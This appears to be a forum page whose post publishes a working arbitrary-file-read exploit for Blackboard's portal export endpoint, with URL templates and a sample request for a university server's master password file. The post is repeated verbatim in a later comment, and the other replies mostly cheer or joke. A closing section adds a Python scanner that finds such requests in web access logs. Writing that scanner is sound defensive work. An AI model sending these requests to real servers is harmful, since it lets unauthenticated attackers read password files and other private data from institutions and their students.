Have you seen this yet... huge Blackboard exploit. A newly discovered exploit of Blackboard allows unauthenticated users to request literally any file on a web server that is running Blackboard. Small universities and other educational centers that run multiple applications on a single web server are especially vulnerable. The Blackboard program must be upgraded immediately; however, Blackboard, Inc is refusing to acknowledge the severity of the problem. While the security hole is not being disclosed by the company, I believe it is so scary that the community must be made aware of it so that every single last Blackboard system is patched. Here is the exploit:
http://<your Blackboard URL>/webapps/portal/export/<filename_to_save_locally>?file_name=<path to any file on the web server you want>
or over SSL:
https://<your Blackboard URL>/webapps/portal/export/<filename_to_save_locally>?file_name=<path to any file on the web server you want>
A nonworking example for unix based systems to request the password file from a fake Harvard Blackboard installation would look like this:
https://blackboard.harvard.edu/webapps/portal/export/ScaryStuff.txt?file_name=/etc/master.passwd
In layman’s terms, the server will then prompt you to save a file called ScaryStuff.txt(?) that contains all the information from the master password file specified at the end of the string. If you are familiar with Blackboard you can obtain almost anything from these servers.
nitroy2k Sep 30, 2008
THIS IS REALLYYYYYY EXCELLENT
morfine Oct 1, 2008
f**k you, two of my friends died from blackboard fights!!
Closed Account Oct 1, 2008
Oh, oh, oh! Ohhhh, your helmet is so big!
rgjigsaw Oct 2, 2008
Star Wars nerds
jmahorney Oct 3, 2008
totally awesome!
alexwebster171 Nov 28, 2008
Straight up stupid. Not clever AND it's old news. Gaddamn.
rsmith5932 Sep 4, 2009
Have you seen this yet... huge Blackboard exploit. A newly discovered exploit of Blackboard allows unauthenticated users to request literally any file on a web server that is running Blackboard. Small universities and other educational centers that run multiple applications on a single web server are especially vulnerable. The Blackboard program must be upgraded immediately; however, Blackboard, Inc is refusing to acknowledge the severity of the problem. While the security hole is not being disclosed by the company, I believe it is so scary that the community must be made aware of it so that every single last Blackboard system is patched. Here is the exploit:
http://<your Blackboard URL>/webapps/portal/export/<filename_to_save_locally>?file_name=<path to any file on the web server you want>
or over SSL:
https://<your Blackboard URL>/webapps/portal/export/<filename_to_save_locally>?file_name=<path to any file on the web server you want>
A nonworking example for unix based systems to request the password file from a fake Harvard Blackboard installation would look like this:
https://blackboard.harvard.edu/webapps/portal/export/ScaryStuff.txt?file_name=/etc/master.passwd
In layman’s terms, the server will then prompt you to save a file called ScaryStuff.txt(?) that contains all the information from the master password file specified at the end of the string. If you are familiar with Blackboard you can obtain almost anything from these servers.
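For administrators who want to check their own web server logs for the request pattern described in the comment above, here is an added detection example; it is not part of the original comments and is not Blackboard code. It assumes "combined" format access logs, and the path heuristic and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path prefix and parameter name as given in the comment above.
EXPORT_PREFIX = "/webapps/portal/export/"
PARAM = "file_name"

# Assumption: access logs are in Apache/Nginx "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def looks_like_filesystem_path(value):
    """Heuristic (assumption): absolute Unix/Windows path or a '..' segment."""
    v = value.replace("\\", "/")
    return v.startswith("/") or bool(re.match(r"[A-Za-z]:/", v)) or ".." in v.split("/")

def find_suspicious_exports(lines):
    """Return one record per export request whose file_name looks like a server path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not unquote(url.path).lower().startswith(EXPORT_PREFIX):
            continue
        # parse_qs percent-decodes values, so encoded slashes and dots are caught too.
        for value in parse_qs(url.query).get(PARAM, []):
            if looks_like_filesystem_path(value):
                hits.append({"ip": m["ip"], "time": m["ts"],
                             "status": int(m["status"]), "file_name": value})
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Sep/2008:10:15:01 +0000] "GET /webapps/portal/export/ScaryStuff.txt?file_name=/etc/master.passwd HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [30/Sep/2008:10:16:40 +0000] "GET /webapps/portal/export/out.txt?file_name=%2E%2E%2F%2E%2E%2Fconfig%2Fapp.properties HTTP/1.1" 403 210 "-" "-"',
    '192.0.2.44 - - [30/Sep/2008:10:17:05 +0000] "GET /webapps/portal/export/grades.csv?file_name=grades.csv HTTP/1.1" 200 812 "-" "-"',
    '192.0.2.44 - - [30/Sep/2008:10:18:12 +0000] "GET /webapps/login/?file_name=/etc/hosts HTTP/1.1" 200 300 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_suspicious_exports(SAMPLE_LOG):
        print(hit)
```

Hits with a 200 status deserve the closest review, since they indicate the server answered the request rather than rejecting it.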